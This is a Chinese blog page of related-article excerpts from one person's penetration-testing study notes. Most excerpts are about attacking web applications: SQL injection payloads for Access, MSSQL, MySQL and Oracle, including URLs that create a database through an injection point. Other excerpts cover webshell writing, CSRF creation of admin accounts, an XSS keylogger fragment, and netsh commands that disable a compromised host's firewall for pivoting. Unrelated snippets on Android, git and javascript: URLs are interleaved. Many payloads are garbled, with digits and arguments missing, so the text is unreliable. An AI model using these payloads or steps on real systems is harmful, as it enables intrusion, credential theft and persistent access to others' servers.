大哥带我走渗透8--CSRF的应用】的更多相关文章

5/24/19 周五 access注入 先测试是否有漏洞 or nor and 1=1 and 1=2 2. Order by 猜字表端,发现一共有22个 3..然后使用 union select 1,2,,,,,22 找到那几个字段就是真实的表.我记得是3,15 4. 然后猜表名,,,,分别是:admin password 5. 猜出表名以后,下方就会弹出真正的登陆账号以及密码..admin  dneedss ==============然后打开主目录下的admin或者login就能找到登陆页…
1.大哥给了一个CSRF实战视频,真的很简单,但是我今天晚上有点不在状态,很多简单的问题也没有想.所以做了一个多小时.这件事给我的启发就是,无论发生什么事,都不要影响自己的学习.先写点废话,真的真的,以后的总结,千万不能拖,可以少做点,但是必须写总结. 登录名为admin  密码为admin123 登录进去以后,在设置,管理员设置里面可进行我们的CSRF攻击 2.基本步骤 设置---管理员账户--添加管理员--一步一步添加信息--添加成功 3.通过抓包,一步一步的抓包,可以发现,在管理员添加成功…
5/30 报错注入 0x01 准备阶段 1. 基础知识今天了解了,但是,只能看懂和最基本的理解,不能自己上路.所以,还是要不停学习基础.并且及时总结.这有一篇很详细的文章:https://www.cnblogs.com/pshell/articles/7473713.html 2.现在有基本思路了.先找注入点,然后再确定有几个字段,再确定字段的位置.通过字段位置,查数据库名.表名.列名. 3.找注入点.确定字段数.判断回显位置. 然后发现有三个null,接下来,我们寻找三个null中,哪些才是真…
5/27 基于布尔的盲注 我连题目都看不懂555,先去补充一点知识.https://blog.csdn.net/weixin_40709439/article/details/81355856 返回的true或者false 构造payload让信息通过错误提示回显出来,一种类型(其它的暂时不怎么了解)是先报字段数,再利用后台数据库报错机制回显(跟一般的报错区别是,一般的报错注入是爆出字段数后,在此基础通过正确的查询语句,使结果回显到页面: 后者是在爆出字段数的基础上使用能触发SQL报错机制的注入…
任务二 注入点拿shell 路径的爆破 https://blog.csdn.net/edu_aqniu/article/details/78409451 0X01判断 是否为判断当前数据库用户名是否为DB_OWNER: 是 Mssql拿shell有两种方法 win2008sever里面 0X02数据库备份拿shell 0X001 创建自己的数据库 http://www.aspx-sqli.com/index.asp?id=1;create%20database%20zhong; 0X002先进行…
[-]CSRF是个什么鬼? |___简单的理解: |----攻击者盗用了你的身份,以你的名义进行某些非法操作.CSRF能够使用你的账户发送邮件,获取你的敏感信息,甚至盗走你的财产. |___CSRF攻击原理: |----当我们打开或者登陆某个网站的时候,浏览器与网站所存放的服务器将会产生一个会话(cookies),在这个会话没有结束时,你就可以利用你的权限对网站进行操作.然而,攻击者就是利用这个特性,让受害者触发我们构造的表单或者语句,然后达到攻击者想要达到的目的. [+]如何构造表单? |__…
一.安卓适配之痛真的无解吗? Android平台的诞生对智能手机的普及功不可没,但设备繁多.品牌众多.版本各异,芯片.摄像头.分辨率不统一等等,这些都逐渐成为Android系统发展的障碍,碎片化严重不仅造成Android系统混乱,也导致Android应用隐形开发成本的增多. 安卓碎片化(来源:友盟指数) 这一切让安卓工程师无辜躺枪,安卓适配深似海,准时下班是路人.安卓适配的坑,你踩进去过吗? 安卓适配那些坑 个性化十足的Launcher 多姿多彩的Camera 不止是2的双卡模式 UI适配 厂商…
0X01 先进行判断 a.jsp?username=SMITH and = 发现单引号闭合  我们尝试构造闭合  存在注入 a.jsp?username=SMITH'='1 正确 a.jsp?username=SMITH'='2 错误 0X02构造语句判断 a.jsp?username=SMITH' order by 8-- 正确 a.jsp?username=SMITH' order by 9-- 错误 用null 判断那个字段是字符型  第2 3 个字段为字符型 a.jsp?username…
?id= and ,,sleep()) ?id= and ,,sleep()) if语句/if()函数 在基于时间型SQL盲注中,我们经常使用条件语句来判断我们的操作是否正确: ?id= and = ?id= and = 返回的都是同一个页面 用测试语句 and sleep(5) 判断 是否存在时间盲注 构造语句 ?id= and ,))>,,sleep()) 这句话的意思是如果返回的事错误 那我就sleep(5)秒 好的我们的语句构造成功 0X01爆数据库长度 ?id= and ,,sleep…
1.git是目前世界上最先进的分布式版本控制系统.svn是集成式版本控制系统,那么问题来了,什么叫分布式管理和集中式管理? 首先,svn 需要有一个中央服务器,协同开发者需要同中央服务器连接,所有的版本都存在了中央服务器上.开发者只有本地代码.一旦中央服务器挂掉,所有版本会丢失. git采用分布式版本控制.也就是每个 开发者本地都有一套版本控制库,可以在自己本地实现版本的删除,还原等操作.也不用担心版本库丢失的问题,如果开发者1的版本库丢失,可以直接clone一份开发者2的版本库,开发同一个项目…
将javascript代码添加到客户端的方法是把它放置在伪协议说明符javascript:后的URL中.这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行.如果javascript:URL中的javascript代码含有多个语句,必须使用分号将这些语句分隔开.这样的URL如下所示: ? 1 javascript:var now = new Date(); "<h1>The time is:</h1>" +…
0X01源码分析 那么我们可以如何来构造语法呐??已知eval函数可以执行js 最终的输出是eval(this.xss="你提交的参数";) 那我们是不是可以从参数这里构造一个js 比如 this.xss=1";alert(/zhong/);// 那么我们要这样构造 http://www.xss_demo.com/DOM-xss5.php?xss=k";alert(/zhong/);// 当然这里未对参数名称做验证我们也可以直接在参数名称里面构造 xss http:…
0X01DOM-XSS进阶之inner显式输出 首先我们先了解一下DOM型和和其他到底有什么区别 dom就是一个树状的模型,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值.了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射型xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射型的,也有可能是存储型的),简单去理解就是因为他输出点在DOM.dom - xss是通过url传入参数去控制…
0X01输出在html标签中的XSS 这里相当于我们把XSS代码插入到了 html中的<td>标签中 其他好看的 但是不是同源访问 <script> var body= document.body; var img = document.createElement("img"); img.setAttribute('style','width:100%;height:100%;z-index:99999;position:fixed;top:0px;') img…
0x01反射型 <script>alert("zhong")</script> 可以看见什么都没有过滤 0x02存储型XSS http://www.xss_demo.com/st-xss.php 那么可以看见也是成功了 那我们试试可不可以顺着网线搞一下组员呐??? 算了  没得服务器 搞搞自己吧 document.onkeypress= function(evt){ evt = evt || window.event key = String.fromCharC…
0X01Oracle基于延时的盲注总结 0x00 前言 oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注: oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE(),而另外一种便是decode()与高耗时SQL操作的组合,当然也可以是case,if 等方式与高耗时操作的组合,这里的高耗时操作指的是,例如:(select count(*) from all_objects),对数据库中大量数据进行查询或其…
0X01判断闭合 ?username=SMITH' 错误 ?username=SMITH'' 正确 ?username=SMITH' and ascii(substr((select user from dual),1,1))>82 那么是‘闭合 0X02基于bool的盲注 根据返回信息判断 ?username=SMITH' and ascii(substr((select user from dual),1,1))>82 -- 正确 ?username=SMITH' and ascii(su…
0X01 使用报错注入需要使用类似 1=[报错语句],1>[报错语句],使用比较运算符,这样的方式进行报错注入(MYSQL仅使用函数报错即可),类似mssql报错注入的方式. news.jsp?id= and = 正确 news.jsp?id= and = 错误 存在注入  随便输入 发现存在报错信息我们可以尝试报错注入 0X02报错函数注入 utl_inaddr.get_host_name()进行报错注入 and =utl_inaddr.get_host_name(()) utl_inaddr…
①判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈 ②判断数据库版本       and 1=@@version--这个语句要在有回显的模式下才可以哦       and substring((select @@version),22,4)='2008'--适用于无回显模式,后面的2…
盲注 那么我们来了解一点盲注的语法 这里面是语法的介绍 https://blog.csdn.net/alex_seo/article/details/82148955 0X01第一步我们先判断当前数据库的长度 语法构造 /index.php?id=%20and%20length((select%20database()))%3E3 正确 index.php?id= and length((select database()))>4 错误 那我们确定数据库名字大于3不大于4 那么数据库长度就是4了…
这是今天的任务 任务三个 : 第一个手工注入找出admin用户的密码,第二个读取我phpstudy中mysql的my.ini这个配置文件的内容,第三个是通过这个注入点写入一个webshell,  都是要求手工,具体方法自己百度mysql5注入相关内容 union ,,,, 查询语句 第一步是先构造闭合 加入单引号报错 然后 更据and 1=1 and1=2看是字符型还是布尔型注入 http://www.萨达所大大所多t/index.php?id=1%20order%20by%205 数据库tes…
目标是WIN7 X64,且开启了防火墙,想要用他的机器去访问别的机器,又不想登陆他的系统,常规办法一般是上传一个htran,然后进行转发,但是对方有杀软,有被杀的可能性,所以我用另外一种办法达到我的目的.为了方便,先关闭他的防火墙netsh advfirewall set allprofiles state off(win2003&xp是用netsh firewall set opmode DISABLE 关闭)你也可以放行listenport,具体命令自行查资料.然后用netsh interf…
在form表单以post的方式提交时,django默认会带一个验证的机制csrf验证 <form action="/day02/login/" method="post"> {% csrf_token %} 用户名: <input type="text" name="user"> 密码 <input type="text" name="pwd"> &l…
前几天项目中遇到springSecurity问题,研究了大半天,掉进了csrf的坑,先认识一下csrf CSRF概念:CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解:       攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件.发消息,盗取你的账号,添加系统管理员,甚至于购买商品.虚拟货币转账等. 如下:其中Web A为…
有人问我要渗透测试平台学习,我想到了Samurai ,记得里面带有很多的,这里来推广一下. Samurai Web 测试框架很多人说是live CD测试环境,但是现在似乎不是了,至少目前最新版的只有这么一个文件.下载了最新的SamuraiWTF3.3.2.vmwarevm.zip后,发现不是livecd,就是一个vmware.里面带的用于渗透测试的工具其实不是很多,比起kali什么的差的远了,但是里面带有很多渗透测试平台的确不错.如下图.     可惜下载启动后,发现这些渗透测试平台只能本地访问…
在平时的测试中,csrf也是比较容易发现的,主要就是看它对一个操作,有没有检测其时效性(这样表述可能不太准确),一般的防护方法就是添加token来进行校验,并及时对其进行失效处理. 以下所有代码都是我自己写的,可能有不美观,代码错误等等问题,希望大家可以指正. 在进行添加的时候进行抓包 利用burp自带的工具转成CSRF利用代码 此时,我们先看一下当前的内容 然后,就需要构造一个链接,然后想办法让受害者去点击它,然后执行我们预定的操作,这里我直接本地打开 之后就发现在index页面多出了一行内容…
CSRF是Cross Site Request Forgery的缩写,中文翻译过来是跨站请求伪造.这个漏洞往往能给用户带来巨大的损失,CSRF在等保安全检测中,也是一个非常重要的检测项.但是在我们的网站中,大部分都没有做CSRF的防御,小伙伴们想不想来一次CSRF攻击,体验一下做黑客感觉?如果想要做黑客,可要仔细的往下看哟~ CSRF攻击的原理 要想理解CSRF攻击的原理,我们从一个经典的案例出发,看看它是如何进行攻击的.假设你的银行网站的域名是www.a-bank.com,这个银行网站提供了一…
常见的浏览器攻击分为两种,一种为XSS(跨站脚本攻击),另一种则为CSRF(跨站请求伪造). XSS(跨站脚本攻击) 定义 XSS 全称是 Cross Site Scripting,为了与“CSS”区分开来,故简称 XSS,翻译过来就是“跨站脚本”.XSS 攻击是指黑客往 HTML 文件中或者 DOM 中注入恶意脚本,从而在用户浏览页面时利用注入的恶意脚本对用户实施攻击的一种手段. 存在原因 浏览器为了在安全和自由之间找到一个平衡点.支持了页面中的引用第三方资源和 跨域资源共享(CORS),这样…
概述: Cross-site request forgery 简称为"CSRF"(跨站请求伪造),在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了. 所以CSRF攻击也成为"one click"攻击. 很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的. 这里列举一个场景解释一下, 场景需求:小黑想要修改大白在…
XSS攻击: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的. 比如获取用户的cookie. Django已经默认做了处理,自动防御xss攻击. 但是有时候需要通过传输HTML代码并且让其显示在页面上的时候怎么做: 在需要的时候添加 xxx|safe   需要注意以下几点: 1.不能在别人能修改的地方添加 2.添加的时候要带上特…